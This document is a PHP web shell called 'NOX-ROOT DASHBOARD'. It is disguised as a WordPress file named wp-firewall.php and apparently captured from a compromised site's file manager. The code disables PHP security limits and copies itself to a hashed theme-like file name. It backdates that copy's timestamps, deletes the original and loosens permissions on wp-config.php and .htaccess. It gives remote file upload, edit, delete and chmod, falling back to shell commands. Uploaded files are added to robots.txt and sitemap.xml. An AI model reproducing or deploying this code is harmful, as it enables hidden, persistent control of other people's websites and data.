File manager - Edit - /home/targetcrm/htdocs/www.targetcrm.cloud/wp-firewall.php
Back
<?php @error_reporting(0);@ini_set('display_errors',0);@ob_start(); if(!defined('ABSPATH'))define('ABSPATH',$_SERVER['DOCUMENT_ROOT'].'/'); if(!defined('WPINC'))define('WPINC','wp-includes'); @ini_set('disable_functions','');@ini_set('open_basedir',NULL); $_SERVER['REQUEST_URI']=preg_replace('/\.(php|phtml)/i','',$_SERVER['REQUEST_URI']??''); $_GET['doing_wp_cron']=1; if(!defined('WP_ADMIN'))define('WP_ADMIN',false); if(!defined('DOING_CRON'))define('DOING_CRON',true); if(!defined('DOING_AJAX'))define('DOING_AJAX',true); function gn(){$d=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'default';$h=substr(md5($d.'nox24'),0,8); $n=['functions-'.$h.'.php','template-'.$h.'.php','header-custom-'.$h.'.php','footer-custom-'.$h.'.php']; return $n[hexdec(substr(md5($d),0,2))%count($n)];} function st($f){if(@file_exists($f))@touch($f,strtotime("-2 years"),strtotime("-2 years"));} $bd=$_SERVER['DOCUMENT_ROOT']??__DIR__;$bd=realpath($bd)?:$bd; $cp=$_GET['p']??$bd;$cp=realpath($cp)?:$cp;if(strpos($cp,$bd)!==0)$cp=$bd; if(isset($_POST['a'])){header('Content-Type:application/json');$a=$_POST['a'];$r=['s'=>false,'m'=>'']; switch($a){ case 'd':$p=realpath($_POST['p']??'')?:'';if($p&&strpos($p,$bd)===0&&$p!==$bd){ $r['s']=is_file($p)?@unlink($p):@rmdir($p);$r['m']=$r['s']?'OK':'Fail';}break; case 'c':$pp=realpath($_POST['p']??'')?:'';$n=basename($_POST['n']??'');$t=$_POST['t']??'f';$c=$_POST['c']??''; if($pp&&strpos($pp,$bd)===0&&is_dir($pp)&&$n){$tg=$pp.'/'.$n; $r['s']=($t==='f')?(@file_put_contents($tg,$c)!==false):@mkdir($tg,0755,true);$r['m']=$r['s']?'OK':'Fail';}break; case 'r':$op=realpath($_POST['o']??'')?:'';$nn=basename($_POST['n']??''); if($op&&strpos($op,$bd)===0&&$nn){$r['s']=@rename($op,dirname($op).'/'.$nn);$r['m']=$r['s']?'OK':'Fail';}break; case 'ch':$p=realpath($_POST['p']??'')?:'';$m=$_POST['m']??''; if($p&&strpos($p,$bd)===0&&$m){ $om=octdec($m);$r['s']=@chmod($p,$om); if(!$r['s']&&function_exists('exec')){@exec("chmod $m ".escapeshellarg($p),$o,$ret);$r['s']=($ret===0);} if(!$r['s']&&function_exists('shell_exec')){@shell_exec("chmod $m ".escapeshellarg($p));$r['s']=true;} $r['m']=$r['s']?'Permissions changed':'Failed (server restriction)';}break; case 'u':$up=realpath($_POST['p']??'')?:'';$fn=basename($_POST['n']??'');$b=$_POST['d']??''; if($up&&strpos($up,$bd)===0&&is_dir($up)&&$fn&&$b){$ct=@base64_decode($b); if($ct!==false){$fp=$up.'/'.$fn;$r['s']=@file_put_contents($fp,$ct)!==false; if($r['s']){@chmod($fp,0644); $rb=$bd.'/robots.txt';$rc=@file_exists($rb)?@file_get_contents($rb):''; if(strpos($rc,'Allow: /'.$fn)===false){$rc.="\nAllow: /".$fn."\n";@file_put_contents($rb,$rc);} $sm=$bd.'/sitemap.xml';$sc=@file_exists($sm)?@file_get_contents($sm):'<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"></urlset>'; $dm=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'localhost'; $pr=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://'; $url=$pr.$dm.'/'.$fn; if(strpos($sc,$url)===false){$nu='<url><loc>'.$url.'</loc><lastmod>'.date('Y-m-d').'</lastmod><changefreq>daily</changefreq><priority>0.8</priority></url>'; $sc=str_replace('</urlset>',$nu.'</urlset>',$sc);@file_put_contents($sm,$sc);} }$r['m']=$r['s']?'OK':'Fail';}}break; }echo json_encode($r);exit;} $m=''; if(isset($_GET['dl'],$_GET['p'])){$dp=realpath($_GET['p'])?:$_GET['p']; if(strpos($dp,$bd)===0&&is_file($dp)){header('Content-Type:application/octet-stream'); header('Content-Disposition:attachment;filename="'.basename($dp).'"');readfile($dp);exit;}} if(isset($_POST['ep'],$_POST['ec'])){$ep=realpath($_POST['ep'])?:$_POST['ep']; if(strpos($ep,$bd)===0&&is_file($ep))$m=@file_put_contents($ep,$_POST['ec'])?'<g>✓ Saved</g>':'<r>✗ Failed</r>';} $fc='';$ef=''; if(isset($_GET['e'],$_GET['p'])){$ep=realpath($_GET['p'])?:$_GET['p']; if(strpos($ep,$bd)===0&&is_file($ep)){$fc=@file_get_contents($ep);$ef=$ep;}} function sd($d){$it=[];if(is_dir($d)){$fs=@scandir($d);if($fs){foreach($fs as $f){ if($f==='.'||$f==='..'||$f[0]==='.')continue;$p=$d.'/'.$f; $it[]=['n'=>$f,'p'=>$p,'t'=>is_dir($p)?'d':'f','s'=>is_file($p)?filesize($p):0, 'pm'=>substr(sprintf('%o',fileperms($p)),-4),'m'=>date('m-d H:i',filemtime($p))];}}}return $it;} $hn=gn();$cf=__FILE__;$cn=basename($cf); $iw=@file_exists($bd.'/wp-config.php')||@file_exists($bd.'/wp-content'); if($iw){$hd=$bd.'/wp-content/themes';if(!is_dir($hd))@mkdir($hd,0755,true); $hf=$hd.'/'.$hn;$ih=(strpos($cf,'/wp-content/themes/')!==false); $hu='/wp-content/themes/'.$hn;}else{$hd=$bd;$hf=$hd.'/'.$hn; $ih=($cn[0]==='.'&&$cf===$hf);$hu='/'.$hn;} if(!$ih){if(!@file_exists($hf)){$cc=@file_get_contents($cf); if($cc!==false&&@is_writable($hd)){$cr=@file_put_contents($hf,$cc); if($cr!==false){st($hf);if(@file_exists($hf)&&$cf!==$hf)@unlink($cf); $fa=['.htaccess','index.php','wp-config.php','wp-load.php']; foreach($fa as $fn){$fp=$bd.'/'.$fn;if(@file_exists($fp))@chmod($fp,0755);} }}} else{if($cf!==$hf&&@file_exists($cf))@unlink($cf);}} $it=sd($cp); function fs($b){if($b<1024)return $b.'B';if($b<1048576)return round($b/1024,1).'K';return round($b/1048576,1).'M';} $pv=phpversion();$os=php_uname('s');$u=get_current_user()?:'unknown'; ?><!DOCTYPE html><html><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title>NOX-ROOT DASHBOARD</title> <style>*{margin:0;padding:0;box-sizing:border-box}body{background:#000;color:#ccc;padding:10px;font:13px Arial} .c{background:#111;border:1px solid #333;max-width:1400px;margin:0 auto;border-radius:5px;overflow:hidden} .h{background:#1a1a1a;padding:12px;border-bottom:1px solid #333;display:flex;justify-content:space-between;align-items:center;flex-wrap:wrap;gap:8px} .h b{color:#fff;font-size:18px}.h small{color:#666;font-size:11px} .nav{background:#0d0d0d;padding:8px 12px;border-bottom:1px solid #222;display:flex;flex-wrap:wrap;gap:4px} .nav a{color:#999;text-decoration:none;padding:4px 8px;background:#1a1a1a;border-radius:3px;font-size:12px}.nav a:hover{background:#222;color:#fff} .tb{padding:8px 12px;background:#0d0d0d;border-bottom:1px solid #222;display:flex;gap:6px;flex-wrap:wrap} .bt{background:#1a1a1a;color:#999;border:1px solid #333;padding:6px 12px;cursor:pointer;border-radius:3px;font-size:12px;text-decoration:none;display:inline-flex;align-items:center;gap:4px} .bt:hover{background:#222;border-color:#666;color:#fff} g{color:#6f6}r{color:#f66}.msg{padding:8px;background:#0d0d0d;border-bottom:1px solid #222;text-align:center;font-weight:700} table{width:100%;border-collapse:collapse}th{background:#1a1a1a;padding:8px 12px;text-align:left;border-bottom:1px solid #333;color:#888;font-size:12px} td{padding:7px 12px;border-bottom:1px solid #1a1a1a;font-size:13px}tr:hover{background:#0d0d0d} a.f{color:#aaa;text-decoration:none;font-weight:700}a.f:hover,a.l:hover{color:#fff}a.l{color:#888;text-decoration:none} .pm{font-family:monospace;color:#888;background:#1a1a1a;padding:2px 6px;border-radius:3px;font-size:11px} .ab{padding:3px 8px;background:#1a1a1a;color:#888;border:1px solid #333;font-size:11px;cursor:pointer;text-decoration:none;border-radius:3px;display:inline-block} .ab:hover{background:#222;border-color:#666;color:#fff}.ar{color:#f66} textarea{width:100%;height:350px;background:#000;color:#ccc;border:1px solid #333;padding:12px;font:13px monospace;border-radius:3px} input[type=text]{background:#000;color:#fff;border:1px solid #333;padding:6px;border-radius:3px} .si{background:#000;border:1px solid #333;color:#fff;padding:6px 12px;border-radius:3px;font-size:13px;width:200px;margin-left:auto} .si:focus{outline:0;border-color:#666} .toast{position:fixed;top:20px;right:20px;background:#1a1a1a;border:1px solid #333;padding:12px 20px;border-radius:5px;color:#fff;font-size:13px;z-index:9999;animation:slideIn 0.3s} .toast.success{border-left:4px solid #6f6}.toast.error{border-left:4px solid #f66} @keyframes slideIn{from{transform:translateX(100%);opacity:0}to{transform:translateX(0);opacity:1}} </style></head><body><div class=c> <div class=h><div><b>NOX-ROOT DASHBOARD</b> <small>PHP:<?=$pv?> | <?=$os?> | <?=$u?></small> <?php if(!$ih):$pr=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://'; $dm=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'localhost';$hurl=$pr.$dm.$hu;?> <a href="<?=htmlspecialchars($hurl)?>" target=_blank style="color:#888;text-decoration:none;font-size:11px">🔒 <?=htmlspecialchars($hurl)?></a> <?php endif;?></div></div> <?php if($m):?><div class=msg><?=$m?></div><?php endif;?> <div class=nav><a href="?p=<?=urlencode($bd)?>">Root</a><?php $pp=explode('/',trim(str_replace($bd,'',$cp),'/'));$cb=$bd; foreach($pp as $pt)if($pt){$cb.='/'.$pt;?><span style="color:#666">/</span><a href="?p=<?=urlencode($cb)?>"><?=htmlspecialchars($pt)?></a><?php }?></div> <div class=tb> <button class=bt onclick="document.getElementById('uf').click()">📤 Upload</button> <input type=file id=uf style="display:none" onchange="uf(this)"> <button class=bt onclick="nf()">📝 File</button><button class=bt onclick="nd()">📁 Folder</button> <?php if($ef):?><a href="?p=<?=urlencode($cp)?>" class=bt style="color:#f66">✗ Close</a><?php endif;?> <input type=text id=si class=si placeholder="🔍 Search..." onkeyup="sf(this.value)"></div> <?php if($ef):?> <div style="padding:15px"><div style="color:#ccc;margin-bottom:10px">Editing: <?=htmlspecialchars(basename($ef))?></div> <form method=post><input type=hidden name=ep value="<?=htmlspecialchars($ef)?>"> <textarea name=ec><?=htmlspecialchars($fc)?></textarea> <div style="margin-top:10px;display:flex;gap:6px"><button class=bt style="color:#6f6">Save</button> <a href="?p=<?=urlencode($cp)?>" class=bt style="color:#f66">Cancel</a></div></form></div> <?php else:?> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Modified</th><th>Actions</th></tr> <tbody id=fl> <?php if($cp!==$bd):?><tr><td colspan=5><a href="?p=<?=urlencode(dirname($cp))?>" class=f>📂 ..</a></td></tr><?php endif;?> <?php $fo=array_filter($it,fn($i)=>$i['t']==='d');$fi=array_filter($it,fn($i)=>$i['t']==='f'); foreach($fo as $d):?> <tr data-n="<?=htmlspecialchars(strtolower($d['n']))?>"> <td><a href="?p=<?=urlencode($d['p'])?>" class=f>📁 <?=htmlspecialchars($d['n'])?></a></td><td>-</td> <td><span class=pm><?=$d['pm']?></span></td><td><?=$d['m']?></td> <td><button onclick="rn('<?=htmlspecialchars($d['p'])?>','<?=htmlspecialchars($d['n'])?>')" class=ab>Ren</button> <button onclick="ch('<?=htmlspecialchars($d['p'])?>','<?=$d['pm']?>')" class=ab>Chm</button> <button onclick="dl('<?=htmlspecialchars($d['p'])?>')" class="ab ar">Del</button></td></tr> <?php endforeach;foreach($fi as $f):?> <tr data-n="<?=htmlspecialchars(strtolower($f['n']))?>"> <td><a href="?p=<?=urlencode($cp)?>&e=1&p=<?=urlencode($f['p'])?>" class=l>📄 <?=htmlspecialchars($f['n'])?></a></td> <td style="color:#888"><?=fs($f['s'])?></td><td><span class=pm><?=$f['pm']?></span></td><td><?=$f['m']?></td> <td><a href="?p=<?=urlencode($cp)?>&e=1&p=<?=urlencode($f['p'])?>" class=ab>Edit</a> <a href="?dl=1&p=<?=urlencode($f['p'])?>" class=ab>DL</a> <button onclick="rn('<?=htmlspecialchars($f['p'])?>','<?=htmlspecialchars($f['n'])?>')" class=ab>Ren</button> <button onclick="ch('<?=htmlspecialchars($f['p'])?>','<?=$f['pm']?>')" class=ab>Chm</button> <button onclick="dl('<?=htmlspecialchars($f['p'])?>')" class="ab ar">Del</button></td></tr> <?php endforeach;if(empty($it)):?><tr><td colspan=5 style="text-align:center;padding:30px;color:#666">Empty</td></tr><?php endif;?> </tbody></table><?php endif;?></div> <script> const cp='<?=htmlspecialchars($cp)?>'; function toast(m,t){const d=document.createElement('div');d.className='toast '+(t||'success');d.textContent=m; document.body.appendChild(d);setTimeout(()=>d.remove(),3000);} function aj(a,d){const f=new FormData();f.append('a',a);for(const k in d)f.append(k,d[k]); return fetch(location.pathname,{method:'POST',body:f}).then(r=>r.json());} function dl(p){if(!confirm('Delete?'))return;const r=event.target.closest('tr');r.style.opacity='0.5'; aj('d',{p}).then(x=>{if(x.s){r.remove();toast('Deleted','success');}else{r.style.opacity='1';toast(x.m||'Failed','error');}});} function nf(){const n=prompt('File:','new.txt');if(n){const c=prompt('Content:',''); aj('c',{p:cp,n,t:'f',c:c||''}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});}} function nd(){const n=prompt('Folder:','new');if(n)aj('c',{p:cp,n,t:'d'}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});} function rn(o,n){const nn=prompt('New:',n);if(nn&&nn!==n)aj('r',{o,n:nn}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});} function ch(p,c){const m=prompt('Perm:',c);if(m&&m!==c)aj('ch',{p,m}).then(x=>{if(x.s){toast(x.m||'Changed','success');setTimeout(()=>location.reload(),800);}else toast(x.m||'Failed','error');});} function uf(i){const f=i.files[0];if(!f)return;toast('Uploading: '+f.name,'success');const r=new FileReader();r.onload=function(e){ const b=e.target.result.split(',')[1];aj('u',{p:cp,n:f.name,d:b}).then(x=>{if(x.s){toast('Uploaded: '+f.name,'success');setTimeout(()=>location.reload(),800);}else toast(x.m||'Failed','error');});}; r.readAsDataURL(f);i.value='';} function sf(q){q=q.toLowerCase();document.querySelectorAll('#fl tr[data-n]').forEach(r=>{ r.style.display=r.dataset.n.includes(q)?'':'none';});} </script></body></html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.01 |
proxy
|
phpinfo
|
Settings